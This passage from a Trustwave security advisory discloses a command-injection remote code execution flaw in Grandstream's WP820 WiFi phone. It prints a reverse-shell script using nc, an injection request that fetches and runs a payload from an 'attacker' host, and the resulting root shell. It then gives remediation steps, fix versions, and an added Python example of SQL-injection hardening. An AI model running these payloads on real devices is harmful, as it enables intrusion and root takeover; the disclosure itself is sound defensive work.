      { "extension": null, "group_name": null, "members": "static_defense", "tmp": null },
      { "extension": null, "group_name": null, "members": "blacklist", "tmp": null }
      […]

Finding 7: Remote Code Execution in Grandstream’s WP820 (WiFi Phone)
Credit: Brendan Scarvell of Trustwave
CVE: CVE-2019-10658

Grandstream’s WP820 (WiFi Phone) firmware version 1.0.1.15 and prior is vulnerable to remote code execution through a post-auth command injection vulnerability. The “priority” parameter of the getlogcat API endpoint is vulnerable to command injection, resulting in a root shell.

The contents of x.sh are as follows:

mnz@anima:~/projects/grandstream/wp820$ cat x.sh
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|busybox nc 10.0.0.53 4444>/tmp/f;

Request:
===========================
GET /manager?action=getlogcat&tag=&priority=;{wget,http://attacker/x.sh,-O,/data/x.sh};chmod$IFS+x$IFS/data/x.sh;/data/x.sh;&_=1543919505566 HTTP/1.1
Host: 10.0.0.84
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:63.0) Gecko/20100101 Firefox/63.0
Accept: text/plain, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://10.0.0.84/
X-Requested-With: XMLHttpRequest
Connection: close
Cookie: MyLanguage=en; phonecookie="7672db95"; type=admin; Version="1"; Max-Age=900; needchange=0; ver=1.0.1.15; logindate=1543919482990

----------------------------
mnz@anima:~/projects/grandstream/wp820$ nc -klvp 4444
Listening on
[0.0.0.0] (family 0, port 4444)
Connection from 10.0.0.84 50276 received!
sh: can't find tty fd: No such device or address
sh: warning: won't have full job control
WP820:/ # id
uid=0(root) gid=0(root) groups=0(root) context=u:r:toolbox:s0
WP820:/ # cat /system/root/.ssh/authorized_keys
Public key portion is:
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAmwladAFNFrfljVgMKFzX5JGMKh+lUa1SD+9M2xij2KQ0/J9rWtwy/O7AIGtUwE32jCQ8Qnf6ObmjtIGn0rmVdl7WJ3pGveeRHGjZN8vBSAnP+eXSeVFFcGzUXKlpByqiJ+Z8rPh2nr/TDioAA6M/bfLB643qbFzqREZX678bO6yvbLI9zfexpngT/cq3BT7gCaAHZ8oI+j8rb+YSP/tj0s31E0TIUsD2r/LueRvHRXjXBfl3FOaatwXwHiKXge+qs9RfidnAwFYlcH3D5UleBVdkzsT3HOWmij0O/xtsUVixz3HJmZNNtT6m/9qiEj4jAcU/c6SYjeF3p/FbkggUt7M8Q== xtli@time-machine
Fingerprint: md5 c4:20:ea:09:79:3c:f6:71:90:db:ae:e9:8c:16:c4:90
WP820:/ #
------------------------------

Remediation Steps:
Ensure all devices are up-to-date and running the latest firmware; turn on automatic updates; change all default credentials on the devices for all accounts; run the devices on a separate network from those accessing sensitive information; disable access to all services that aren’t required on the device; and upgrade any end-of-life devices that are no longer receiving security updates.

The firmware versions that were released to address these findings include:

Pre Auth RCE
GAC2500 – fixed in firmware 1.0.3.37 (Beta)
GXP2200 – no plan to fix due to discontinued product
GVC3202 – Plan to be fixed in next firmware release
GXV3275 – fixed in firmware 1.0.3.219 (Beta)
GXV3240 – fixed in firmware 1.0.3.219 (Beta)

Post Auth RCE
GXV3611IR_HD – fixed in firmware 1.0.3.23
UCM6204 – fixed in firmware 1.0.19.20 (Beta)
GXV3370 – fixed in firmware 1.0.1.41 (Beta)
WP820 – fixed in firmware 1.0.3.6
GWN7000 – fixed in firmware 1.0.6.32
GWN7610 – fixed in firmware 1.0.8.18

Please note that Trustwave has not verified all the vendor supplied fixes.
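For the listCodeblueGroup SQL injection in Finding 6 above: "sidx" and "sord" are SQL identifiers (a column name and a sort direction), so they cannot be bound as query parameters and must be mapped through an allowlist instead, while the paging values can be bound normally. This is an added example, not the UCM6204's code; the column set, the in-memory rows and vulnerable_query() are constructed assumptions based on the response shown in that finding.

```python
import sqlite3

# Assumed column set behind listCodeblueGroup; the advisory's response shows
# extension, group_name, members and tmp.
COLUMNS = ("extension", "group_name", "members", "tmp")
SORTABLE_COLUMNS = frozenset(COLUMNS)
SORT_DIRECTIONS = {"asc": "ASC", "desc": "DESC"}


def vulnerable_query(sidx, sord, item_num, page):
    """Hypothetical reconstruction of the flaw's shape: sort column and direction
    concatenated straight into the statement. Returned as text, never executed."""
    return ("SELECT extension, group_name, members, tmp FROM codeblue_group "
            "ORDER BY %s %s LIMIT %s OFFSET %s" % (sidx, sord, item_num, (page - 1) * item_num))


def list_codeblue_group(conn, sidx="extension", sord="asc", item_num=10, page=1):
    """Hardened version. ORDER BY takes identifiers, which cannot be bound as
    parameters, so both are mapped through allowlists; paging values are bound."""
    if sidx not in SORTABLE_COLUMNS:
        raise ValueError("unsupported sort column: %r" % sidx)
    direction = SORT_DIRECTIONS.get(str(sord).lower())
    if direction is None:
        raise ValueError("unsupported sort direction: %r" % sord)
    if not (isinstance(item_num, int) and isinstance(page, int) and item_num > 0 and page > 0):
        raise ValueError("paging values must be positive integers")
    sql = ('SELECT extension, group_name, members, tmp FROM codeblue_group '
           'ORDER BY "%s" %s LIMIT ? OFFSET ?' % (sidx, direction))
    rows = conn.execute(sql, (item_num, (page - 1) * item_num)).fetchall()
    return [dict(zip(COLUMNS, row)) for row in rows]


def build_demo_db():
    """In-memory table with constructed rows (the advisory shows one real row)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE codeblue_group (extension TEXT, group_name TEXT, members TEXT, tmp TEXT)")
    conn.executemany("INSERT INTO codeblue_group VALUES (?, ?, ?, ?)",
                     [("2", "apples", "1001", "2"), ("1", "pears", "1002", "1")])
    return conn


if __name__ == "__main__":
    conn = build_demo_db()
    print(list_codeblue_group(conn, "extension", "asc"))
    injected = 'asc;select null,"noot noot",sqlite_version(),null;--'
    print(vulnerable_query("extension", injected, 10, 1))
    try:
        list_codeblue_group(conn, "extension", injected)
    except ValueError as exc:
        print("rejected:", exc)
```

The allowlist also closes the "sidx" side, which the advisory does not exercise but which is the same identifier-concatenation pattern; the only values that ever reach the SQL text are the constants in SORTABLE_COLUMNS and SORT_DIRECTIONS.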
Revision History:
12/06/2018 : Vulnerabilities disclosed to vendor
02/11/2019 : Vendor announces firmware updates for all except GWN7000, GVC3202
03/01/2019 : Vendor announces firmware updates available for GWN7000
03/22/2019 : Advisory 1.0 published
03/27/2019 : Advisory 2.0 published
04/05/2019 : Advisory 3.0 published

About Trustwave:
Trustwave is the leading provider of on-demand and subscription-based information security and payment card industry compliance management solutions to businesses and government entities throughout the world. For organizations faced with today’s challenging data security and compliance environment, Trustwave provides a unique approach with comprehensive solutions that include its flagship TrustKeeper compliance management software and other proprietary security solutions. Trustwave has helped thousands of organizations, ranging from Fortune 500 businesses and large financial institutions to small and medium-sized retailers, manage compliance and secure their network infrastructure, data communications and critical information assets. Trustwave is headquartered in Chicago with offices throughout North America, South America, Europe, Africa, China and Australia. For more information, visit https://www.trustwave.com

About Trustwave SpiderLabs:
SpiderLabs® is the advanced security team at Trustwave focused on application security, incident response, penetration testing, physical security and security research. The team has performed over a thousand incident investigations, thousands of penetration tests and hundreds of application security tests globally. In addition, the SpiderLabs Research team provides intelligence through bleeding-edge research and proof of concept tool development to enhance Trustwave’s products and services. https://www.trustwave.com/spiderlabs

Disclaimer:
The information provided in this advisory is provided “as is” without warranty of any kind. Trustwave disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Trustwave or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Trustwave or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.